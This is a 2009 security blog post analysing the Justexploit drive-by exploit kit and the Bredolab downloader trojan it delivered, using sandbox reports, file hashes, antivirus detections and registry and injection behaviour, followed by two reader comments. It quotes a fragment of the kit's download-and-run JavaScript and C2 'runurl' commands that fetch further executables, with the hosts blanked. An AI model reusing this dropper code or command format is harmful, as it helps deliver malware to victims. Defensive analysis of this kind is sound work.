Sunday, December 6, 2009

Poking at the Justexploit kit Part 1

Malware is of interest to me for several reasons. It's helpful to know what's out there, both as a defender and as a penetration tester. Successful malware campaigns mean that the attackers are showing attack surface that a penetration tester can also leverage. As a defender, it's helpful to know what the various attack kits are using so those particular issues can be mitigated in areas of higher risk, IDS signatures written, minds primed for forensics analysis, etc. Regardless of my distaste of harmful and criminal activities, from a technical and research perspective, malware is worth knowing about and is with us for the long haul.

Seasoned malware analysts won't find anything new in this post. Some of this post may be redundant with previous analysis, as I have not done extensive queries to see if this material has not yet been published. Malware URL's are going to be modified, as I don't want to end up on blacklists, nor do I want people clicking on the malware links unless they know what they are doing.

I became aware of the Justexploit kit recently, blogged about by EvilFingers at http://www.efblog.net/2009/11/justexploit-new-exploit-kit-that-uses.html and mentioned in a few other places. It was easy to find some of these kits through queries to malwaredomainlist.com http://www.malwaredomainlist.com/mdl.php?search=justexploit&colsearch=All&quantity=50 and I picked the most current entry at the time, which I won't include on this blog because I don't want it flagged as a malicious site. Suffice it to say that the site has the word "nuclear" in it's URL and you can figure it out from there. The site is located on ASN 47821 and various new domains, starting with a batch of .cn domains, were pointed at the same IP address (probably hosted in a "bullet-proof" hosting facility) starting on 11/27/09. They started using .info domains on 12/5/09, according to the malwaredomainlist query posted above.

One reason why Justexploit is interesting is it's use of Java bugs. While there have been a few java exploits in the wild, they haven't seemed to be as widespread as other vectors such as Adobe Reader and Adobe Flash, which have both been added to just about every drive-by exploit kit in existence. A screenshot of the Justexploit control panel, obtained by EvilFingers posted at https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFAwQQSuPyg2sz6N5pKmxaS5KajKzmS9ES03fVkCiCZOZBCPP6aCmehzQnfXrR6-tLW2NKcE9jjBCncvVnSKbAo-wgy88y6T6G8l0BTU_qfaoKUUeUXidANr4Uc4ssSNEj62aK2c4L0NqB/s1600/mipistus-justexploit.png shows that Java has been the highest attack vector so far, with 3230 successful exploits (I don't read Russian, but I'm assuming that's what the statistics mean). EvilFingers posted his blog on 11/29/09 with an admin panel screenshot. My attempts to obtain an admin panel screenshot from this particular install ("campaign") failed since an .htaccess password was placed, prompting as "Multiplex Corporation Ltd.". This information is also available on a forum thread at malwaredomainlist.com at http://www.malwaredomainlist.com/forums/index.php?topic=3570.0 where someone apparently guessed the password to view the admin page.

Wepawet is a nice sandbox, and a big time-saver for any javascript or PDF-based malware. Sure you can use Malzilla or other tools to de-obfucate the javascript, but Wepawet has done a nice job almost every time I've used it. I can think of a copule of situations where it hasn't been able to properly read some flash .swf malware but otherwise it's great.

The analysis for the domain I was looking at can be found:

http://wepawet.iseclab.org/view.php?hash=375f0265a92dd4da4bb3063f1c444aee&t=1260165589&type=js

Some of the highlights from the wepawet report include the following:

function Go(a){
var s = CreateO(a, 'WScript.Shell');
var o = CreateO(a, 'ADODB.Stream');
var e = s.Environment('Process');
var urltofile = 'http://.info/feedback.php?page=1';
var filename = 'YVgHg.exe';

Requesting feedback.php?page=1 returns a windows PE binary with a (at least in five downloads) consistent md5 hash:

ab92cc8f7abeafffc9b588eda2f968cd feedback.php?page=1
ab92cc8f7abeafffc9b588eda2f968cd feedback.php?page=1.1
ab92cc8f7abeafffc9b588eda2f968cd feedback.php?page=1.2
ab92cc8f7abeafffc9b588eda2f968cd feedback.php?page=1.3
ab92cc8f7abeafffc9b588eda2f968cd feedback.php?page=1.4

Like most malware, the binary appears to be packed. Submissions to VirusTotal reveal a rather pathetic 12.2% coverage: only 5 out of 41 malware scanners (static file analysis, which obviously does not take run-time into account) find anything. The results indicate strong chances of a Bredolab malware, which has been analyzed in various places already. One of the scary things about Bredolab was that according to one analysis, it could download up to 27 other malwares. Who knows what the current capabilities are, and covering Bredolab is beyond the scope of this entry. I think Symantec or one other large A/V firm had a detailed writeup. I do recall a connection with the nasty Zeus infostealer/banking fraud trojan though.

Here are the five detects:

CAT-QuickHeal 10.00 2009.12.07 (Suspicious) - DNAScan
Comodo 3103 2009.12.01 Heur.Packed.Unknown
F-Secure 9.0.15370.0 2009.12.07 Suspicious:W32/Malware!Gemini
Kaspersky 7.0.0.125 2009.12.07 Trojan-Downloader.Win32.Piker.kr
Sunbelt 3.2.1858.2 2009.12.06 Trojan.Win32.Bredolab.Gen.1 (v)

The full report can be viewed here - http://www.virustotal.com/analisis/ba1a607c9f3067958a9cef0029ebdc2f25d59b98454c888a0085bc12ff696179-1260168039

On my analysis box, checking the download (feedback.php) with the Avira anti-malware engine does not generate any alert, but does show the presence of what looked at first like an Alternate Data Stream (ADS) - feedback.php:Zone.identifier - is just the presence of Microsofts Attachment Manager at work, blocking the file since it came from an untrusted source (analysis box is running Vista, malware downloaded via Firefox).

Threatexpert.com is a nice sandbox, a huge time saver over analyzing a binary in something like Olly or Immunity Debugger or dumping the file from memory with win32dd or other memory dumping tool (or ollydump or equivalent). Tonights run of this Bredolab trojan is found here -

http://www.threatexpert.com/report.aspx?md5=ab92cc8f7abeafffc9b588eda2f968cd

Highlight from the threatexpert report are as follows (pardon the lousy formatting, view the original if you need the details or need it to look pretty)

Four files created:

%Temp%\1.tmp
%System%\ahwa.ulo Trojan:Win32/Oficla.E [Microsoft]
%Temp%\2.tmp Trojan.Vundo [PCTools]
Trojan.Vundo!gen2 [Symantec]
Troj/Virtum-Gen [Sophos]
Trojan:Win32/Hiloti.gen!A [Microsoft]

%Windir%\gkboiers.dll Trojan.Hiloti [PCTools]
Troj/Virtum-Gen [Sophos]
Trojan:Win32/Hiloti.gen!A [Microsoft]

4 [file and pathname of the sample #1] 37,376 bytes MD5: 0xAB92CC8F7ABEAFFFC9B588EDA2F968CD
SHA-1: 0x60368810858C5E3E20359F0EC7BE558ADF6D8D7A (not available)

[file and pathname of the sample #1] refers to the original binary, which was not given any malware alias. I was expecting to see that it would be recognized as Bredolab, however I suppose the engines that ThreatExpert supports must not be among the five that detected, as previously mentioned.

%Windir%\gkboiers.dll gets injected into the memory space of other processes, including explorer.exe, msmsgs.exe, sdnsmain.exe, iexplore.exe, the "generic host process filename"

Injection in Explorer, MSN Messenger, and IE are obvious malware/adware/spyware activity, but I was less certain about sdnsmain.exe. Turns out, sdnsmain.exe is apparently not dropped by this particular Bredolab install but refers to "Simple DNS Plus - Core Engine" (sdnsmain.exe) which is a 3rd party Windows DNS server. A future exercise may involve installing Simple DNS Plus to see what Bredolab does with it. I suspect that it will redirect certain queries to adware/spyware/etc. pages or maybe allow the attackers to inject DNS responses for financial sites, allowing for credential theft. I don't know if Bredolab does this, but if some malware were to serve as a rogue DHCP server it could push it's local DNS server to the client who would then get infected.

A variety of registry modifications were made to keep the malware persistent.

The file apparently has Russian origin (gee, what a surprise)

The following URL's were contacted:

o http:// .cn/SHasg2/bb.php?id=555611691&v=200&tm=2&b=3857054178
o http://.cn/SHasg2/bb.php?id=555611691&v=200&tm=3&b=3857054178&tid=9&r=1
o http://.eu/free1/h4.exe

Following the rabbit-hole further, we find more wholesome malware.

The first link for bb.php contains the following data:

[info]runurl:http://.cn/win32/ff.exe|taskid:10|delay:25|upd:0|backurls:[/info]

Sure looks like a command sequence to download and run yet another binary. Snort or other IDS signatures could be easily created from this sequence for EXtrusion detection. I would want a larger sample size before generating a signature, as to reduce false positives.

ff.exe had previously been analyzed by VirusTotal here:

http://www.virustotal.com/analisis/81536e8ca89d57c313e45a591eb0d913f187fbb347efa99edf1d2be649cbb2f6-1259947806

Looks like yet another instance of Bredolab. Results from ff.exe are a tiny bit better, 6 out of 41 (at the time of the previous sample submission)

CAT-QuickHeal 10.00 2009.12.04 Win32.Packed.Krap.w.4
Comodo 3103 2009.12.01 Heur.Packed.Unknown
eTrust-Vet 35.1.7158 2009.12.04 Win32/Bredolab!generic
Norman 6.03.02 2009.12.04 W32/Obfuscated.EA
Prevx 3.0 2009.12.04 Medium Risk Malware
Sunbelt 3.2.1858.2 2009.12.04 Trojan.Win32.Bredolab.Gen.1 (v)

It's starting to feel like we are in a hall of mirrors. This reminds me of Tom Liston's "follow the bouncing malware" series that he has done for SANS Incident Storm Center (isc.sans.org).

The second URL, http://.cn/SHasg2/bb.php?id=555611691&v=200&tm=3&b=3857054178&tid=9&r=1, returns a different result:

[info]kill:0|delay:25|upd:0|backurls:[/info]

The third URL, http://.eu/free1/h4.exe was caught by Windows Defender on the Vista analysis box as Trojan:Win32/Hiloti.gen!A.

I intend to dig deeper into what the Justexploit kit is doing in future blog entries.

2 comments:

  1. Hi bro! Good post ;P
    I tell you that original entry isn't evilfingers blog, is in Malware Intelligence Blog (malwareint.blogspot.com). This is teh english version. The Spanish version is the original (mipistus.blogspot.com).

    I wrote that and if I can help you with something just tells ;P

    ReplyDelete
  2. Thank you Jorge for the correction about the original source & thanks for the offer. I have followed you on Twitter in the meanwhile. Have a good one.

    ReplyDelete